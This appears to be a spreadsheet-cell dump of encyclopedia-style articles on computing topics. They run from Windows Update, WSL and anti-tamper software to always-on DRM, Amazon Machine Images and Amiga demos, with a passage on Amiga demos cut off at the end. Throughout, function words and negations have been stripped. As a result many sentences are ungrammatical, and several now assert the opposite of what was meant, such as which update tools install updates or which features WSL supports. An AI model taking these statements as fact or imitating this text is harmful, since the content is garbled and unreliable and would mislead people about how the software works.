update released 2001 conjunction windows changed this. this version makes inventory system's hardware microsoft software sends service, thus offloading processing burden microsoft servers. critical update notification utility critical update notification utility (initially critical update notification tool) background process checks windows update site regular schedule updates marked "critical". released shortly windows default, check occurs every five minutes, plus internet explorer starts; however, user could configure next check occur certain times certain days week. tool queries microsoft server file called "cucif.cab", contained list critical updates released operating system. tool compares list list installed updates machine displays update availability notification. once check executed, custom schedule defined user reverted default. microsoft stated ensures users received notification critical updates timely manner.an analysis done security researcher moore early 1999 critical approach, describing "horribly inefficient" susceptible attacks. posting bugtraq, explained that, "every single windows computer wishes update rely single host security. server compromised day, attacker cracks [microsoft] server again, could millions users installing trojans every hour. scope attack enough attract crackers actually know doing..."microsoft continued promote tool 1999 first half 2000. initial releases windows 2000 shipped tool. tool support windows windows 4.0. automatic updates automatic updates successor critical update notification utility. released 2000, along windows supports windows 2000 well. unlike predecessor, automatic updates download install updates. instead five-minute schedule used predecessor, automatic updates checks windows update servers day. after windows installed, notification balloon prompts user configure automatic updates client. user choose three notification schemes: being notified downloading update, notified installing update, both. updates ready installed, user install turning computer. shield icon displayed shutdown button time. windows windows 2000 include background intelligent transfer service, windows service transferring files background without user interaction. system component, capable monitoring user's internet usage, throttling bandwidth usage order prioritize user-initiated activities. automatic updates client operating systems updated system service. automatic updates windows gained notoriety repeatedly interrupting user working computer. every time update requiring reboot installed, automatic updates would prompt user dialog allowed user restart immediately dismiss dialog box, would reappear minutes; behavior jeff atwood described "perhaps naggiest dialog ever."in 2013, observed shortly startup process, automatic updates (wuauclt.exe) service host (svchost.exe) windows would claim 100% computer's capacity extended periods time (between minutes hours), making affected computers unusable. according woody leonhart infoworld, early reports issue could seen microsoft technet forums late 2013, although microsoft first received large number complaints issue september 2013. cause exponential algorithm evaluation superseded updates grown large decade following release windows microsoft's attempts issue october, november december proved futile, causing issue escalated priority. windows update agent starting windows vista windows server 2008, windows update agent replaces windows update automatic updates client. charge downloading installing software update windows update, well on-premises servers windows server updates services system center configuration manager.windows update agent managed control panel applet, well group policy, microsoft intune windows powershell. also automatically download install important recommended updates. prior versions windows, updates available windows update site. additionally, windows update windows vista supports downloading windows ultimate extras, optional software windows vista ultimate edition. unlike automatic updates windows windows update agent windows vista windows allows user postpone mandatory restart (required update process complete) four hours. revised dialog prompts restart appears windows, instead them. however, standard user accounts minutes respond dialog box. this changed windows users days hours) computer reboots automatically installing automatic updates require reboot. windows also consolidates restart requests non-critical updates month. additionally, login screen notifies restart requirements.windows update agent makes transactional ntfs feature introduced windows vista apply updates windows system files. this feature helps windows recover cleanly event unexpected failure, file changes committed atomically.windows contains major changes windows update agent operations; longer allows manual, selective installation updates. updates, regardless type (this includes hardware drivers), downloaded installed automatically, users given option choose whether system would reboot automatically install updates system inactive, notified schedule reboot. microsoft offers diagnostic tool used hide troublesome device drivers prevent reinstalled, already installed, uninstalled without rebooting system.windows update agent windows supports peer-to-peer distribution updates; default, systems' bandwidth used distribute previously downloaded updates users, combination microsoft servers. users optionally change windows update perform peer-to-peer updates within local area network.windows also introduced cumulative updates. example, microsoft released updates kb00001 july, kb00002 august, kb00003 september, microsoft would release cumulative update kb00004 packs kb00001, kb00002, kb00003 together. installing kb00004 also install kb00001, kb00002 kb00003, mitigating need multiple restarts reducing number downloads needed. kb00004 also include fixes kb-number separately released. disadvantage cumulative updates downloading installing updates individual problems longer possible. stands knowledge base microsoft knowledge base. windows update business windows update business term features pro, enterprise education editions windows intended ease administration windows across organizations. enables pros switch standard deferred release branches windows this feature since removed microsoft retired deferred branch. defer automatic installation ordinary updates days. starting windows version 20h1, feature difficult access. defer automatic installation windows upgrades (a.k.a "feature updates") days. starting windows version 20h1, updates longer automatically offered.these features added windows version 1511. they intended large organizations many computers, logically group computers gradual deployment. microsoft recommends small pilot computers receive updates almost immediately, critical computers receive every group done experienced effects.other microsoft update management solutions, windows server update services system center configuration manager, override windows update business. rather, force windows "dual scan mode". this cause confusion administrators comprehend full ramifications dual scan mode. complementary software services organizations continued computers, per-machine windows update clients started become unwieldy insufficient. response need organizations deploying updates many machines, microsoft introduced software update services (sus), later renamed windows server update services (wsus). component windows server family operating systems, wsus downloads updates microsoft products server computer running redistributes computers within organization local area network (lan). benefits method reduction consumption internet bandwidth, equal (n-1)×s, number computers organization size made updates. additionally, wsus permits administrators test updates small group test computers deploying systems, order ensure business continuity disrupted changes updates. large organizations, multiple wsus servers chained together hierarchically. only server hierarchy downloads internet. update packages distributed windows update service individually downloaded microsoft update catalog. these updates installed computers without internet access (e.g. flash drive) slipstreamed windows installation. case former, windows update agent (wusa.exe) install files. case latter, microsoft deployment utilities dism, wadk consume packages. microsoft offers system center configuration manager complex deployment servicing scenarios. product integrates aforesaid tools (wsus, dism, wadk, mdt) automate process. number tools created independent software vendors provide ability windows updates automatically downloaded for, added online offline system. common offline updates ensure system fully patched security vulnerabilities connected internet another network. second downloads large, dependent slow unreliable network connection, updates needed machine. autopatcher, wsus offline update, portableupdate, windows updates downloader examples tools. service beginning 2005, windows update accessed million people, million using automatic updates. 2008, windows update million clients, processed million unique scans day, maintained average million simultaneous connections client machines. patch tuesday, microsoft typically releases software updates, outbound traffic could exceed gigabits second. approximately clients used automatic updates initiate software updates, remaining using windows update site. site built using asp.net, processes average 90,000 page requests second. traditionally, service provided patch proprietary archive file. occasionally, microsoft released service packs bundled updates released course years certain product. starting windows however, patches delivered cumulative packages. august 2016, microsoft announced effective october 2016, future patches windows would become cumulative windows ability download install individual updates would removed existing updates transitioned model. this resulted increasing download sizes monthly update. analysis done computerworld determined download size windows increased 119.4mb october 2016 203mb october 2017. initially, microsoft vague specific changes within cumulative update package. however, since early 2016, microsoft begun releasing detailed information specific changes.in 2011, update service decommissioned windows updates systems removed servers. august 2020, update service decommissioned windows 2000, server 2003 vista microsoft discontinuing sha-1 updates. updates still available microsoft update catalog. microsoft update february 2005 conference, microsoft announced first beta microsoft update, optional replacement windows update provides security patches, service packs updates windows microsoft software. initial release june 2005 provided support microsoft office 2003, exchange 2003, server 2000, running windows 2000, server 2003. over time, list expanded include microsoft products, windows live, windows defender, visual studio, runtimes redistributables, zune software, virtual virtual server, capicom, microsoft lync, microsoft expression studio, server products. also offers silverlight windows media player optional downloads applicable operating system. office update office update free online service allows users detect install updates certain microsoft office products. original update service supported office 2000, office office 2003 office 2007. august 2009 microsoft decommissioned office update service, merging microsoft update. microsoft update support office 2000. with introduction office licensing program, however, microsoft activated separate office update service service office customers. owners perpetual microsoft office licenses continue receive updates microsoft update. references external links microsoft update website microsoft technical security notifications</t>
  </si>
  <si>
    <t>Windows Subsystem for Linux</t>
  </si>
  <si>
    <t>windows subsystem linux (wsl) compatibility layer running linux binary executables format) natively windows windows windows server 2019. 2019, announced, introducing important changes real linux kernel, subset hyper-v features. since june 2019, available windows customers windows insider program, including home edition. available windows users default. installed either joining windows insider program manual install. history microsoft's first foray achieving unix-like compatibility windows began microsoft posix subsystem, superseded windows services unix mks/interix, eventually deprecated release windows 8.1. technology behind windows subsystem linux originated unreleased project astoria, enabled android applications windows mobile. first made available windows insider preview build 14316.whereas microsoft's previous projects third-party cygwin focused creating unique unix-like environments based posix standard, aims native linux compatibility. instead wrapping non-native functionality win32 system calls cygwin did, wsl's initial design (wsl leveraged kernel executive serve linux programs special, isolated minimal processes (known "pico processes") attached kernel mode "pico providers" dedicated system call exception handlers distinct vanilla process, opting reutilize existing implementations wherever possible.wsl beta introduced windows version 1607 (anniversary update) august 2016. only ubuntu (with bash default shell) supported. beta also called "bash ubuntu windows" "bash windows". longer beta windows version 1709 (fall creators update), released october 2017. multiple linux distributions could installed available install windows store.in 2017 richard stallman expressed fears integrating linux functionality windows hinder development free software, calling efforts like step backward campaign freedom."though (via initial design) much faster arguably much popular brethren unix-on-windows projects, windows kernel engineers found difficulty trying increase wsl's performance syscall compatibility trying reshape existing kernel recognize operate correctly linux's api. microsoft ignite conference 2018, microsoft engineers gave high-level overview "lightweight" hyper-v technology containerization virtualized kernel could make direct primitives host. 2019, microsoft announced completely redesigned architecture (wsl using lightweight technology hosting actual (customized) linux kernel images, claiming full syscall compatibility. microsoft announced 2019, shipped windows version 2004. also backported windows version 1903 1909.gpu support gpu-accelerated machine learning introduced windows build 20150. support linux applications graphical user interfaces (guis) introduced windows build 21364. both shipped windows april 2021, microsoft released windows test build also includes ability linux graphical user interface (gui) apps using cbl-mariner. windows subsystem linux (wslg) officially released microsoft build 2021 conference. included windows insider build 21364 later.microsoft introduced windows store version october 2021 windows features available windows server 2019 versions windows version 1607, though 64-bit versions. microsoft envisages "primarily tool developers especially developers work open source projects". september 2018, microsoft said "wsl requires fewer resources (cpu, memory, storage) full virtual machine" (which prior direct linux software windows environment), also allowing users windows apps linux tools files.the first release provides linux-compatible kernel interface developed microsoft, containing linux kernel code, user space linux distribution ubuntu, opensuse, suse linux enterprise server, debian kali linux. such user space might contain bash shell command language, native command-line tools (sed, awk, etc.), programming-language interpreters (ruby, python, etc.), even graphical applications (using server host side).the architecture redesigned linux kernel running lightweight virtual machine environment. wsl.exe wsl.exe command used manage distributions windows subsystem linux command-line. list available distributions, default distribution, uninstall distributions. command also used linux binaries windows command prompt windows powershell. wsl.exe replaces lxrun.exe deprecated windows 1803 later. wslg wslg short windows subsystem linux built purpose enabling support running linux applications (x11 wayland) windows fully integrated desktop experience. wslg officially released microsoft build 2021 conference. included windows insider build 21364 later. however, introduction windows wslg finally shipping production build windows bringing support graphics audio apps.freerdp used encode communications going server weston) client (mstsc windows) according protocol specifications. prerequisites running wslg include: windows windows insider preview builds 21362-21390. system virtual (vgpu) enabled recommended, allow benefit hardware accelerated opengl rendering design lxss manager service service charge interacting subsystem (through drivers lxss.sys lxcore.sys), bash.exe (not confused shells provided linux distributions) launches linux processes, well handling linux system calls binary locks execution. linux processes invoked particular user "linux instance" (usually, first invoked process init). once applications closed, instance closed. design featured hardware emulation virtualization (unlike projects colinux) makes direct host file system (through volfs drvfs) parts hardware, network, guarantees interoperability. servers example, accessed interfaces addresses configured host, shares restrictions ports require administrative permissions, ports already occupied applications. there certain locations (such system folders) configurations whose access/modification restricted, even running root, sudo shell. instance elevated privileges must launched order "sudo" give real root privileges, allow access.wsl capable running linux software, 32-bit binaries, require specific linux kernel services implemented wsl. lack "real" linux kernel kernel modules, device drivers, cannot run. however, makes live virtualized linux kernel instances. possible graphical (gui) applications (such mozilla firefox) installing server within windows (host) environment (such vcxsrv xming), although without caveats, lack audio support (though remedied installing pulseaudio windows similar manner x11) hardware acceleration (resulting poor graphics performance). support opencl cuda also implemented currently, although planned future releases. microsoft stated designed development applications, desktop computers production servers, recommending virtual machines (hyper-v), kubernetes, azure purposes.in benchmarks performance often near native linux ubuntu, debian, intel clear linux linux distributions. tests bottleneck wsl. redesigned backend claimed microsoft offer twenty-fold increases speed certain operations compared june 2020, benchmark tests threadripper 3970x shows good performance (20h2) performance native ubuntu 20.04.0 lts. this improvement performance native ubuntu comparison. improves performance, providing near-native level. comparison tests intel 10900k 2020 shows nearly relative performance. december 2020, benchmark tests ryzen 5900x shows good performance (20h2) performance native 20.04.1 lts. this improvement comparison. version introduces changes architecture. microsoft opted virtualization highly optimized subset hyper-v features, order kernel distributions (based upon kernel), promising performance equivalent backward compatibility, developers need change anything published distributions. settings tweaked global configuration, contained file named .wslconfig user profile folder.the distribution installation resides inside ext4-formatted filesystem inside virtual disk, host file system transparently accessible protocol, similarly virtual machine technologies like qemu. users, microsoft promised times read/write performance from windows network redirector provided linux guest file access using path prefix \\wsl$. requires windows version 1903 higher, build 18362 higher, systems, version 2004 higher, build 19041 higher, arm64 systems. also azure sphere freebsd#os compatibility layers smartos#virtualization windows terminal xenix references further reading barnes, hayden (2021). windows subsystem linux (wsl): powerful tools practices cross-platform development collaboration. apress. isbn 978-1484268728. leeks, stuart (2020). windows subsystem linux (wsl tips, tricks, techniques: maximise productivity windows development machine custom workflows configurations. packt publishing. isbn 978-1800562448. singh, prateek (2020). learn windows subsystem linux: practical guide developers professionals. apress. isbn 978-1484260371. external links microsoft docs github wsl2-linux-kernel github brown, pete july 2016). "fun windows subsystem linux". windows developer blog. microsoft.</t>
  </si>
  <si>
    <t>Anti-worm</t>
  </si>
  <si>
    <t>Anti-tamper software</t>
  </si>
  <si>
    <t>anti-tamper software software makes harder attacker modify measures involved passive obfuscation make reverse engineering difficult active tamper-detection techniques make program malfunction operate modified. essentially tamper resistance implemented software domain. shares certain aspects also differs related technologies like copy protection trusted hardware, though often used combination them. anti-tampering technology typically makes software somewhat larger also performance impact. there provably secure software anti-tampering methods; thus, field arms race attackers software anti-tampering technologies.tampering malicious, gain control aspect software unauthorized modification alters computer program code behaviour. examples include installing rootkits backdoors, disabling security monitoring, subverting authentication, malicious code injection purposes data theft achieve higher user privileges, altering control flow communication, license code bypassing purpose software piracy, code interference extract data algorithms counterfeiting. software applications vulnerable effects tampering code changes throughout lifecycle development deployment operation maintenance. anti-tamper protection applied either internally externally application protected. external anti-tampering normally accomplished monitoring software detect tampering. this type defense commonly expressed malware scanners anti-virus applications. internal anti-tampering used turn application security system generally done specific code within software detect tampering happens. this type tamper proofing defense take form runtime integrity checks cyclic redundancy checksums, anti-debugging measures, encryption obfuscation. execution inside virtual machine become common anti-tamper method used recent years commercial software; used example starforce securom. some anti-tamper software uses white-box cryptography, cryptographic keys revealed even cryptographic computations observed complete detail debugger. recent research trend tamper-tolerant software, aims correct effects tampering allow program continue unmodified. simple (and easily defeated) scheme kind used diablo video game, stored critical player data copies different memory locations modified externally, game used lower value.anti-tamper software used many types software products including: embedded systems, financial applications, software mobile devices, network-appliance systems, anti-cheating games, military, license management software, digital rights management (drm) systems. some general-purpose packages developed wrap existing code minimal programing effort; example securom similar kits used gaming industry, though downside semi-generic attacking tools also exist counter them. malicious software observed using anti-tampering techniques, example mariposa botnet. also hardening (computing) fault tolerance denuvo digital rights management references</t>
  </si>
  <si>
    <t>Anti-spam appliances</t>
  </si>
  <si>
    <t>anti-spam appliances software hardware devices integrated on-board software implement spam filtering and/or anti-spam instant messaging (also called "spim") deployed gateway front mail server. they normally driven operating system optimized spam filtering. they generally used larger networks companies corporations, isps, universities, etc. reasons hardware anti-spam appliances might selected instead software could include: customer prefers hardware rather software ease installation operating system requirements independence existing hardware references</t>
  </si>
  <si>
    <t>Wireless router</t>
  </si>
  <si>
    <t>wireless router device performs functions router also includes functions wireless access point. used provide access internet private computer network. depending manufacturer model, function wired local area network, wireless-only lan, mixed wired wireless network. features wireless routers typically feature network interface controllers supporting fast ethernet gigabit ethernet ports integrated main system chip (soc) around router built. ethernet switch described ieee 802.1q interconnect multiple ports. some routers implement link aggregation ports used together improving throughput redundancy.all wireless routers feature wireless network interface controllers. these also integrated main separate chips printed circuit board. also distinct card connected minipci minipcie interface. some dual-band wireless routers operate bands simultaneously. wireless controllers support part ieee 802.11-standard family many dual-band wireless routers data transfer rates exceeding mbit/s (for band) mbit/s (for band). some wireless routers provide multiple streams allowing multiples data transfer rates (e.g. three-stream wireless router allows transfers gbit/s bands). some wireless routers ports. these used connect printer desktop mobile external hard disk drive used shared resource network. port also used connecting mobile broadband modem, aside connecting wireless router ethernet xdsl cable modem. mobile broadband adapter connected router share mobile broadband internet connection wireless network. some wireless routers come either xdsl modem, docsis modem, modem, fiber optic modem integrated. wi-fi clone button simplifies wi-fi configuration builds seamless unified home network, enabling super range extension, means automatically copy ssid password router. operating system common operating system embedded devices linux. less frequently, vxworks used. devices configured user interface served light server software running device. possible computer running desktop operating system appropriate software wireless router. this commonly referred softap. 2003, linksys forced open-source firmware wrt54g router series (the best-selling routers time) people linux kernel mailing list discovered used linux code. 2008, cisco sued free software foundation, inc. cisco systems, similar issues linksys routers. since then, various open-source projects built foundation, including openwrt, dd-wrt, tomato. 2016, various manufacturers changed firmware block custom installations ruling. however, companies plan continue officially support open-source firmware, including linksys asus. also wi-fi protected setup references</t>
  </si>
  <si>
    <t>XML denial-of-service attack</t>
  </si>
  <si>
    <t>denial-of-service attack (xdos attack) content-borne denial-of-service attack whose purpose shut service system running service. common xdos attack occurs message sent multitude digital signatures naive parser would look signature cycles, eating resources. these less common inadvertent xdos attacks occur programming error trusted customer causes handshake infinite loop. also denial-of-service attack application layer ddos attack billion laughs command control (malware) ddos mitigation fork bomb high orbit cannon (hoic) hit-and-run ddos industrial espionage infinite loop intrusion detection system orbit cannon (loic) network intrusion detection system redos slowdroid slowloris (computer security) zombie (computer science)</t>
  </si>
  <si>
    <t>XCP-ng</t>
  </si>
  <si>
    <t>xcp-ng linux distribution project, pre-configured hypervisor project (xapi) working out-of-the-box. project born 2018, following fork citrix xenserver (now citrix hypervisor). since january 2020, also part linux foundation, project. name xcp-ng stands cloud platform next generation. successor xcp, initially created open source version citrix xenserver 2010. time xenserver closed source, open source version containing subset features. xenserver open sourced 2013, project halted. several years later citrix stopped delivering xenserver free open source, project revived xcp-ng. history december 2017, citrix announced would remove important features xenserver free edition make available paid tiers. also, xenserver focused toward community since: public build instructions available since xenserver 7.4, even impossible start virtual machine proprietary components community feedback taken account external contributions accepted even possible (due lack publicly accessible code repository various components)in response, original founder orchestra open source management platform xenserver), olivier lambert, announced would revive project, original goals: providing free/libre 100% community backed version xenserver.soon after, kickstarter campaign started quickly exceeded original milestone.on march 31st, 2017, xcp-ng announced first official release. after five releases (see releases section) months beta, first long term support (lts) version announced november 2020. components xcp-ng compared linux distribution, meant out-of-the-box. collection components creating coherent system install bare-metal server. based multiple projects, like centos user space packages, xapi project api, project hypervisor, open vswitch networking xcp-ng provides also extra packages available elsewhere, non-existent closed-sources citrix hypervisor. fork xenserver "upstream first" philosophy, xcp-ng stays pretty close original citrix project, considered "friendly fork". releases xcp-ng (lts) also notes references external links official website</t>
  </si>
  <si>
    <t>XB Machine</t>
  </si>
  <si>
    <t>machine discontinued virtual operating system small enough drive. last version seems 0.9.1.5 mid-2008. brought secure computing environment anonymized internet activity, portable encrypted file storage. developed offered xerobank based modified gentoo linux distribution. could executed virtual machine qemu hypervisor, vmware, virtualbox, major virtualization system. could also booted burned booting. virtualization, along native implementation onion routing internet connectivity encryption privacy tools, utilized increase security anonymity user. developers claimed secure operating system world technology involved highly resistant hacking spying, even hostile environments. details transactions inside machine account protected 256-bit encryption. software also self-destruct sequence eliminating traces user left behind drivespace using machine. meanwhile, xerobank offers modular package browser, mail, vpn, parts running customers bank. features machine include: livecd bootable windows, linux cd-rom/usb/hdd bootable internalized qemu vmware detection support kqemu accelerator kernel module includes browser (firefox inbuilt network) includes mail (generic thunderbird atm) torrent support ctorrent self-destruct references</t>
  </si>
  <si>
    <t>Always-on DRM</t>
  </si>
  <si>
    <t>always-on always-online form requires consumer remain connected server, especially internet connection, particular product. practice also referred persistent online authentication. technique meant prevent copyright infringement software. like methods, always-on proven controversial, mainly failed stop pirates illegally using product, causing severe inconvenience people bought product legally single point failure inherently introduces. usage criticism popular video games diablo iii, super mario starcraft employ always-on requiring players connect internet play, even single-player mode. reviews diablo criticized always-on drm. diablo iii, simcity (2013) experienced bugs launch always-on drm. developer, maxis, initially defended practice result game's reliance cloud computing in-game processing, later confirmed cloud computing necessary support inter-city social media mechanisms. willits software also defended always-on drm, arguing would make updates easier. this later received even criticism, users stating updates could potentially render game unable played.a major disadvantage always-on whenever authentication server goes region experiences internet outage, effectively locks people playing game, hence criticism. another major disadvantage servers game shut down, game rendered completely unplayable without illegal circumvention, case darkspore edition settlers 7.ubisoft's first titles requiring always-on connection silent hunter battle atlantic assassin's creed former reportedly cracked first game's release. assassin's creed later cracked release japan. ubisoft also used always-on driver: francisco, also cracked. however, company announced september 2012 would employ always-on future games, although decided re-implement crew (despite story mode), division (although never meant single-player gameplay) honor. assassin's creed odyssey also received backlash unavailable offline mode february 2019, ubisoft clarified always-online mode glitch fixed soon enough, although many players face issue able play game without internet connection. crew garnered criticism always-online spite campaign. ubisoft later confirmed game would available offline, wanted make game living world multiplayer single-player combined. later criticized making latest game need speed always online, even though single player multiplayer modes. later stated game ever-expanding world would constantly updated would required taking snapshots posting autolog, would earn player experience points rewards snapshots liked enough. this later garnered criticism. end, later found reason drastic framerate drops need speed platforms always-online connection. because this, decided make later games playable offline, next need speed game, payback, offline single-player campaign mode. sony interactive entertainment polyphony digital later criticized making latest title, gran turismo require constant internet connection order players able save progress. series creator kazunori yamauchi explains decision made prevent hacking cheating, arcade mode fully playable offline. this severe criticism reviewers, noted game's overall grind earn credits online requirement used major push game's microtransactions, more week release, game maintenance period unplayable patched.activision recently criticized making games always-online battle.net even single-player modes. this apparent call duty modern warfare, call duty modern warfare remastered, tony hawk's skater 1+2, crash bandicoot it's about time.hitman later criticized always-online able save certain areas levels game. square enix clarified would game constantly, evolving, living world assassination grow alongside community frequent content updates launch location. this live content includes contracts, escalation contracts, elusive targets, even additional challenges", possible play game offline, separate save states offline online made. however, game later patched make sure locations levels could fully played offline mode, disadvantage leaderboards would accessible, regular updates would installed, live events would available playing, areas could used starting point missions. square enix later received criticism implementing always-on remastered version final fantasy x/x-2 2019, years game launched. square enix later removed update altogether modifications.quantum break, game developed remedy also criticized always-online version, fact live episodes limited resolution streamed storage limitations according microsoft, despite fact personal computers constantly upgraded storage time goes nevertheless, possible play game offline without logging microsoft, result live-action cutscenes game disabled, leaderboards becoming inaccessible, also result another consequence, game's protagonist jack joyce wearing pirate patch, reference another remedy-developed microsoft-published game alan wake, protagonist alan wake would wear patch steam version game ever pirated. playing game offline without logging windows store make game think pirated make jack wear eye-patch, warez group managed make trainer game option remove eye-patch. 2016 reboot doom also later criticized requiring always-online order vulkan recently implemented game update, although still offline opengl executable. star wars: battlefront patched games offline mode sometime july 2016. xbox play anywhere games like recore, gears forza horizon also criticized required online launched authenticated every hours. denuvo also immensely criticized using similar method, many tech reviewers problems benchmarking denuvo-implemented games like clancy's ghost recon: wildlands deus mankind divided. october 2015, always-online games single player modes dead servers months longer exempt dmca prohibitions circumventing copyright protection.during month october 2019 launch rockstar games launcher, single player story mode game grand theft auto sold distributed steam required activation internet every time game startup process, whereas previously game required periodic activation every days. whether intentional defective design effect implementing rockstar games launcher extra layer game unclear, neither game developer publisher rockstar games, game distributor valve publicly acknowledged commentated change status drm. november 2019 rockstar games rolled update rockstar games launcher reverted status grand theft auto always-on back previous periodic activation implementation. always-on restricted computer games, discovered early ninth generation video game consoles form exists programming design three generations playstation consoles, playstation playstation playstation well xbox series gaming consoles' increasing reliance internet connectivity. three playstation consoles fully operational persistently connected playstation network depend maintain date time, used prevent players cheating claiming unlocked trophies unreasonably early time. when connection lost, systems rely internal cmos battery maintain date time, depleted removed, digitally downloaded games become unplayable system would thus means ascertain current date time. this issue, known c-bomb, adversely affects most, mandatory date time check also extends physical games, meaning system unable play games check fail. late september 2021, sony released firmware update resolved issue, time-stamping trophies would disabled accurate date time obtained psn. similar also issued november. xbox series system requires console remain connected xbox network system start disc-based backwards compatible games. these measures hinder video game preservation online services become discontinued point future. also digital distribution phoning home references</t>
  </si>
  <si>
    <t>Amanda (software)</t>
  </si>
  <si>
    <t>advanced maryland automatic network disk archiver (amanda) open source computer archiving tool able back data residing multiple computers network. uses client–server model, server contacts client perform backup scheduled time.amanda initially developed university maryland released bsd-style license. amanda available free community edition fully supported enterprise edition. amanda runs almost unix unix-like systems. amanda supports windows systems using samba native win32 client support open files.amanda supports tape-based disk-based backup, provides useful functionality available backup products. amanda supports tape-spanning i.e. backup tape, split multiple tapes. major releases recent stable release version 3.5.1, released december 2017. enterprise edition commercial version amanda developed company zmanda. includes management graphical user interface (gui) features scheduler, plugin framework, optional cloud backup service support. cloud backup option uses amazon service amazon services cloud storage provider enables safe offsite storage amanda backup data. plugin framework allows application-specific backups used amanda enterprise support applications oracle database, samba network share, ndmp, etc. amanda enterprise also supports image-level backup live virtual machine running vmware infrastructure. also bacula proxmox backup server references external links official website</t>
  </si>
  <si>
    <t>Amazon Machine Image</t>
  </si>
  <si>
    <t>amazon machine image (ami) special type virtual appliance used create virtual machine within amazon elastic compute cloud ("ec2"). serves basic unit deployment services delivered using ec2. contents like virtual appliances, main component read-only filesystem image includes operating system (e.g., linux, unix, windows) additional software required deliver service portion it.an includes following: template root volume instance (for example, operating system, application server, applications) launch permissions control accounts launch instances block device mapping specifies volumes attach instance launchedthe filesystem compressed, encrypted, signed, split series chunks uploaded amazon storage. manifest file stores information ami, including name, version, architecture, default kernel decryption digests filesystem chunks. current amis available hardware virtualized machines (hvm) operating system installed would real hardware. with still available older paravirtualized virtual machines (pv), include kernel image, pointer default kernel could chosen approved list safe kernels maintained amazon partners (e.g., hat, canonical, microsoft). users could choose kernels default booting ami. operating systems when launched august 2006, service offered linux later microsystems' opensolaris solaris express community edition. october 2008, added windows server 2003 windows server 2008 operating systems list available operating systems. december 2010, also reported freebsd; march 2011, netbsd amis became available. november 2012, windows server 2012 support added. amazon linux amazon linux distribution largely binary compatible enterprise linux. this offering production since september 2011, development since 2010. final release original amazon linux version 2018.03 uses version 4.14 linux kernel. amazon linux changed system init system systemd boot. announced june 2018, updated regular basis. types images public: used anyone. paid: for-pay registered amazon devpay used anyone subscribes devpay allows developers mark-up amazon's usage fees optionally monthly subscription fees. shared: private used amazon users allowed access developer. references external links creating preparing amis amazon services developer community amazon machine images (amis) amazon linux</t>
  </si>
  <si>
    <t>X.1035</t>
  </si>
  <si>
    <t>itu-t recommendation x.1035 specifies password-authenticated agreement protocol ensures mutual authentication parties using diffie–hellman exchange establish symmetric cryptographic key. diffie-hellman exchange ensures perfect forward secrecy—a property establishment protocol guarantees compromise session long-term private given session cause compromise earlier session. x.1035, exchange protected man-in-the-middle attack. authentication relies pre-shared secret (e.g., password), protected (i.e., remains unrevealed) eavesdropper preventing off-line dictionary attack.the protocol used wide variety applications including pre-shared secrets based possibly weak passwords. x.1035 approved february 2007 itu-t study group applications g.hn, itu-t standard specifies high-speed gbit/s) local area networking existing home wires (power lines, phone lines coaxial cables), uses x.1035 authentication exchange. references</t>
  </si>
  <si>
    <t>Amiga Disk File</t>
  </si>
  <si>
    <t>amiga disk file (adf) file format used amiga computers emulators store images floppy disks. around almost long amiga itself, although initially called particular name. before known adf, used commercial game production, backup disk virtualization. track-by-track dump disk data read amiga operating system, "format" really fixed-width amigados data tracks appended another held file. this file would, typically, formatted, like disk, amiga file system (ofs). most files plain images amiga-formatted tracks held cylinder standard 3.5-inch double-density floppy disk, also called disk amiga terms. size vary depending many tracks imaged, practice unusual find files 901,120 bytes size cylinders heads sectors bytes/sector). most amiga programs distributed double-density floppy disks. there also 3.5-inch high-density floppy disks, hold 1.76 data, uncommon. amiga also 5.25-inch double-density disks. winuae amiga emulator supports three disk formats, 3.5-inch double-density common. files downloaded copied amiga disks easyadf application various applications freely available internet. plain disk images, handled unix tool linux netbsd, support common amiga filesystems, files mounted directly. there program called opus, microsoft windows–based program allows people create files. this program supports creating double density (880 files, common) high-density (1.76 files. opus also allows people convert files files. there also command line program called unadf, allows extract files file. part utility pack amitools contains programs named xdftool. read, write, format, operations adf-images. file file compressed gzip. typical file extension .adz, derived .adf.gz. file format store disks legal amigados format tracks. disks non-standard tracks available format, albeit cracked order create regular amigados volume. however, amiga limited storing data standard tracks. amiga's floppy disk controller basic transparent, reason flexible allowing disks custom formats read written well. disk handling locked like modern work read write disks done operating system itself. however, programmers operating system routines, quite normal games developers create disk formats also apply many different sorts copy protection. was, full-price commercial amiga games form custom disk format and/or copy protection them. reason, commercial amiga games cannot stored files unaltered, alternative called interchangeable preservation format (ipf) specifically designed purpose. software preservation society interchangeable preservation format (.ipf) open format source code official library available. files sometimes compressed using disk masher system, resulting .dms files. (from formatted disk image) universal disk image file format specification originally published vincent joguin 2000. format publicly documented, accompanied open source access tools. because format store low-level data, example required support copy protection schemes non-standard formats, files larger disk image files formats. typical file extension .fdi. because universal design format, files disk image formats, adf, dms, theory converted fdi. also references notes</t>
  </si>
  <si>
    <t>Amiga demos</t>
  </si>
  <si>
    <t>amiga demos demos created commodore amiga home computer. "demo" demonstration multimedia capabilities computer point, demonstration skill demo's constructors). there intense rivalry 1990s among best programmers, graphic artists computer musicians continually outdo other's demos. since amiga's hardware less fixed (unlike today's industry, arbitrary combinations hardware together), competition test limits hardware perform theoretically "impossible" feats refactoring problem hand. europe amiga undisputed leader mainstream multimedia computing late 1980s early 1990s, though eventually overtaken architecture. some amiga demos, megademo, kefrens megademo viii crionics silents "hardwired" considered seminal works demo field. amiga demos released even today, although demo scene firmly moved onto hardware. many amiga game developers active demo scene. demo scene spearheaded development multimedia programming techniques amiga, rigueur latest visual tricks, soundtrackers algorithms demo scene used computer game development. demo software most demos written 68000 assembly language, although written languages. utilize full hardware performance, amiga demos optimized written entirely purpose assembly (avoiding generic portable code). additional performance achieved utilizing several co-processors parallel 68000. these co-processors include, copper co-processor synchronizing custom chipset writes video display sync) blitter chip capable quickly moving blocks graphical data position screen another). achieve best speed demos disabled operating system addressed hardware directly. first bigger demos released 1987, "tech tech" sodan magician released november 1987 considered classic many.eric schwartz produced series animated demos movieplayer, animation software package similar toon boom. animated demos drew heavily whimsy graphic style comic strips. sector incorporated (rsi) produced piece software called demomaker, allowed users script demos, replete scrolltext, vectorballs, plasma screens, etc. full demos range several megabytes. there several thousand demos produced many countries. some active demo countries denmark, finland, germany, italy, netherlands, norway, sweden, poland others. intros smaller demos often known intros. they typically limited 64kb size. intros originally used tags cracking groups computer games software. purpose intro advertise cracking distribution skill particular group. later developed stand-alone form. many demo intro groups disassociated cracking copying scene, although people could still involved ripping amiga thrived public domain, freeware not-for-profit development. architecture provided substantial mechanism protecting software inspection. order read memory simply performed reset (which preserved contents ram) booted dedicated floppy disk could inspect dump memory's contents. therefore common developers hackers "rip" music, graphics code reuse productions. this intense competition certain fields, example, development sound tracking software tetris clones, group developers trying outdo current state art. fact, 